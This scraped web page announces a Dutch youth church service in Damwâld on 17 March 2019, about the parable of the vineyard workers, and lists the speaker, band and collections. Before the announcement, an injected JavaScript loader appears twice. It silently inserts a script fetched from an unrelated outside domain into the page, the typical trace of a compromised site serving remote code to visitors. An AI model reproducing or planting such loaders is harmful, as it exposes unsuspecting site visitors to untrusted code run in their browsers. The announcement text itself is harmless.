;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); YOUNITED jeugdkerk - PKN Damwâld
zondag 17 maart 2019
19:30 uur
m.m.v. gospelband Grutsk

YOUNITED jeugdkerk

Thema: Hoeveel ben jij waard?

Thema: Hoeveel ben jij waard?
Datum: zondag 17 maart 2019Tijd: 19:30
Spreker: Robert Colijn
Band: Grutsk
Locatie: De Ontmoeting, Foarwei 48 te Damwâld

In 2019 gaan de thema’s van de jeugddiensten over gelijkenissen die Jezus gebruikte om zijn toehoorders te onderrichten. Deze eerste dienst van het jaar gaat over de gelijkenis van de arbeiders in de wijngaard, die te vinden is in Matteüs 20.
Wat is rechtvaardig en wat niet? Wanneer presteert iemand beter dan de ander? We voelen ons wel eens oneerlijk behandeld, omdat iemand anders dezelfde beloning krijgt voor werkzaamheden die niet hetzelfde zijn. Dat voelt oneerlijk maar dat hoeft dat niet altijd zo te zijn. Voor God is iedereen even veel waard en dan maakt het dus eigenlijk niet uit wat rechtvaardig is en wat niet.
In deze dienst kijken we samen naar het verhaal over een landheer die arbeiders nodig heeft. Hij geeft aan het einde van de dag iedereen hetzelfde aantal munten. De arbeiders die eerder zijn begonnen vinden dat onrechtvaardig. Op 17 maart zoeken we samen in De Ontmoeting uit of dat ook echt onrechtvaardig is of dat dat juist is zoals het hoort te zijn.
Jullie zijn van harte welkom om 19.30 uur in de Ontmoeting. Na afloop van de dienst staat er een drankje en een hapje klaar in ’t Honk achter de kerk.

Informatie

Voorganger:Robert Colijn
Thema:Hoeveel ben jij waard?
Mededeling:m.m.v. gospelband Grutsk
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Stichting Denbi: ambulance in Ethiopië
Tweede collecte: Sponsorkindje Miracle via Compassion & onkosten
Uitganscollecte: dienst